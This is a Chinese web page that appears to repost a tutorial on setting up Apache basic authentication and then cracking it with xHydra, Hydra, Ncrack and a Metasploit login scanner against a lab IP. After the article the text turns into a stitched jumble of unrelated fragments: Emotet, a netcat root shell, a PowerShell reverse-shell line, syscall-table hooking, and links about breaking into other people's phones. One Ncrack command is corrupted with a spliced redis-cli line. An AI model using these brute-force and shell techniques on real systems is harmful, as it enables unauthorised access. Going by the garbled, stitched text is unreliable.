黑客技术渠道:多种测验HTTP身份验证的办法

访客5年前黑客资讯986

在这篇文章中,我们会告知我们怎么维护Apache Web服务器免受未经身份验证的用户不合法拜访,以及怎么躲藏要害中心信息不被不合法用户

查看到。当然了,我们还会介绍怎么运用这些安全缺点来浸透方针服务器,信任这也是我们十分感兴趣的东西。

HTTP基础认证(BA)

在HTTP事务处理环境中,基础拜访身份认证是HTTP用户署理在央求供给用户名和暗码时需求运用到的一种安全办法。

实际上,HTTP基础认证(BA)是完成对Web资源拜访控制的一种最简略的技能,由于它不需求规划cookie、会话辨认符或登录页面,HTTP基础认证是需求运用到HTTP头中的规范字段,并且还不需求进行握手。

可是,BA机制不会为凭据的传输供给机密性维护。它只会在传输过程中对相关信息进行Base64编码,而不会选用任何方式的加密。因而,HTTPS一般需求结合BA一同运用。

试验环境建立

1、 Apache服务器(Ubuntu 14.04)

2、 浸透检验设备(Kali Linux)

3、 设置暗码认证

4、 设备Apache有用东西包

运用下列指令设备Apache2有用包:

sudo apt-get install apache2 apache2-utils

创建暗码文件

运用htpasswd指令创建暗码文件,Apache将会用它来验证用户身份:

 

sudo htpasswd -c /etc/apache2/.htpasswd raj

cat /etc/apache2/.htpasswd

gedit etc/apache2/sites-enabled/000-default.conf

 

在虚拟主机设置中装备拜访控制

将下列装备内容保存到000-default.conf文件中:

<Directory "/var/www/html">

       AuthType Basic

       AuthName "Restricted Content"

       AuthUserFile /etc/apache2/.htpasswd

       Require valid-user

</Directory>

运用.htaccess文件装备拜访控制

翻开Apache装备文件,批改.htaccess文件来启用暗码维护,添加下列代码:

sudo gedit /etc/apache2/apache2.conf

ServerName localhost

将AllowOverride参数批改为“All”,保存并重启Apache服务:

<Directory /var/www/>

   Options Indexes FollowSymLinks

   AllowOverride All

   Require all granted

</Directory>

现在,我们需求往受限目录中添加一个.htaccess文件。这儿我们给整个网站添加约束,当然了,你也能够约束独自目录:

sudo nano /var/www/html/.htaccess

AuthType Basic

AuthName "Restricted Content"

AuthUserFile /etc/apache2/.htpasswd

Require valid-user

sudo service apache2 restart

承认暗码认证

在浏览器中检验拜访受限资源,承认你的内容已受维护。这儿会弹出如下所示的验证框:

假如你拜访的内容没有弹出认证窗,或许你取消了认证页面,那你将会看到401未授权拜访过错。

输入正确的用户名和暗码之后,你就应该能够拜访网站内容了:

运用HTTP认证缝隙xHydra

这是一款通过FTP端口和字典侵犯侵略系统的图形化东西,在Kali中翻开xHydra,选择“Single Target option”,设置方针IP,其他按下图勾选:

Passwords标签页装备如下,装备好字典文件:

切换到Start标签,点击“Start”,能够看到字典侵犯的进展以及终究的成果:

Hydra

Hydra能够针对50种协议进行快速的字典侵犯,其间包含telnet、ftp、http、https、 *** b以及多种502BD7662A553397BBDCFA27B585D740A20C49FC数据库。操作指令如下:

hydra -L user.txt -P pass.txt 192.168.0.105 http-get

Ncrack

Ncrack是一款高速 *** 认证破解东西,它能够协助企业检验 *** 安全状况,并辨认弱暗码。操作指令如下:

ncrack -U user.txt登录redis并批改其装备 redis-cli -h 192.168.192.133 -P pass.txt http://192.168.0.105

Metasploit

下面这个模块能够对HTTP认证服务进行侵犯,翻开Kali终端,输入“msfconsole”,然后输入下列指令:

use auxiliary/scanner/http/http_login

msf auxiliary(scanner/http/http_login) > set user_file  user.txt

msf auxiliary(scanner/http/http_login) > set pass_file  pass.txt

msf auxiliary(scanner/http/http_login) > set rhosts 192.168.0.105

msf auxiliary(scanner/http/http_login) >  set stop_on_success

msf auxiliary(scanner/http/http_login) > exploit

跋文

期望这篇文章的内容能够协助我们了解HTTP弱装备的安全风险,并协助我们更好地提高自己网站的安全性。

 

* 参阅来历:hackingarticles,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

黑客技术渠道:多种测验HTTP身份验证的办法

研究人员通过CNMAE域名记载接收了子域,并将一切到主机的央求到非注册的Azure的子域。通过一个一般的Azure账户,就能够注册一个子域并添加对应的主机名(host name)。这样就能够控制主机上的内容。2) 云控作业部分 :多种测试HTTP身份验证的 ***

黑客技术平台创建检验项目后,下一步是设置代码签名证书。首要,翻开Xcode首选项,然后选择“Accounts”。要添加Apple ID帐户,请单击左下角的加号并登录你的帐户。然后单击右下角的“Manage Certificates”。5. 通过在保存ADB和Fastboot二进制文件的同一目录中翻开指令提示符/Power Shell/Terminal,并根据你其时的操作系统输入以下指令,保证你的PC能够正常辨认你的Pixel 3手机:最近,在出名的Emotet银行木马中发现了一个生动的活动,它运用了免费系统东西但目的不明。 US-CERT本年(2018年)发布了针对这个特定版其他Emotet的警报,提到其运用了NirSoft Password-Recovery东西。手动删去此文件会在 5 秒钟后重现生成出现。

由于大多数Linux操作系统都设备了netcat,是以能够或许将提权后的敕令提高为root shell。根除结束后终究还得copy或许重装正常的系统指令。2.有缝隙的IoT装备黑客技术平台

控制端实行:9.6.3

4. SQL注入

在侵犯机器中设备好python 2.6.6和pywin32,并设置好python的环境变量,以便我们在cmd中运用。该研讨团队的Siamak Shahandashti博士标明:“这就好比是在玩拼图相同,你所得到的信息越多,你就能够越快拼出无缺的图。”$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)

多种测试HTTP身份验证的 ***

黑客技术平台-trigger 标明主题中你想用来触发规则的指令action = iptables[name=SSH, port=ssh, protocol=tcp] #动作的相关参数,对应action.d/iptables.conf文件

斐讯K1之所以能免费,有两大“秘籍”。一是附赠的铃铛卡,第二个是关键,待会再说。

声明:本文仅仅是入门和基础,你需求根据自己的需求来扩展。

sys_call_table[__NR_mkdir] = fake_mkdir;黑客技术平台

正如你所了解的那样,USB交互设备和USB存储器这两大类USB设备是现在我们运用最为广泛的。

公有云运维安全四大风险第四步:多种测试HTTP身份验证的 ***

"id": redacted,这儿我现已知道了机器的IP地址,不过由于network::arp Brik的存在你能够通过在vboxnet0接口上进行ARP扫描来获得IP地址。7、我国#Blockip/net(subnet)
本文标题:黑客技术渠道:多种测验HTTP身份验证的办法

相关文章

黑客qq群号不要钱(股票qq群号)

黑客qq群号不要钱(股票qq群号)

  “倾家荡产,是你自己的错!”   — —某黑客   加密货币难以追踪,且在大多数情况下,加密货币也是不受管制的,它基于一个去中心化的区块链网络。这意味着一旦加密货币被盗,就基本上不可能找回了。So...

广告跳转安全警告提示HTML源码

一款简洁的广告跳转安全警告提示HTML源码 做网站的基本是靠广告营收,源码的作用主要就是提示用户这是第三方广告,交易前请谨慎。把文件传到根目录 然后挂广告的链接格式:http://你的...

唐朝时人们过中秋节也会有假期吗 蚂蚁庄园2020年10月1日答案

唐朝时人们过中秋节也会有假期吗 蚂蚁庄园2020年10月1日答案

支付宝蚂蚁庄园小课堂10月1日每日一题答案是什么?支付宝蚂蚁庄园小课堂每天的凌晨更新一道题目,答对后能领取小鸡饲料,今天的问题是“唐朝时人们过中秋节,也会有假期吗?”不知道答案的朋友不妨随三大妈小编一...

英国黑客(英国黑客电影)

英国黑客(英国黑客电影)

本文目录一览: 1、历史上最著名的几次黑客事件 2、世界黑客谁能与阿桑奇比肩? 3、你认识地球上已知的十位电脑最强黑客吗? 4、加里·麦金农的介绍 5、国外著名的黑客团队有哪些 历史...

黑客帝国电影完整版韩国(黑客帝国电影图片)

黑客帝国电影完整版韩国(黑客帝国电影图片)

本文导读目录: 1、关于电影《黑客帝国》动画版! 2、黑客帝国3:矩阵革命高清完整版下载 3、黑客帝国 4、黑客帝国2:重装上阵完整版电影 5、黑客帝国1高清完整版下载 6、博大精...

能不能黑进别人的手机(有什么办法可以黑进别人手机)

能不能黑进别人的手机(有什么办法可以黑进别人手机)

本文导读目录: 1、怎么在手机上把别人的手机号拉进黑名单? 2、怎么能黑了别人的手机 3、用手机黑进别人的手机? 4、怎样黑别人的手机? 5、怎么能黑进别人的手机看照片 6、用手机...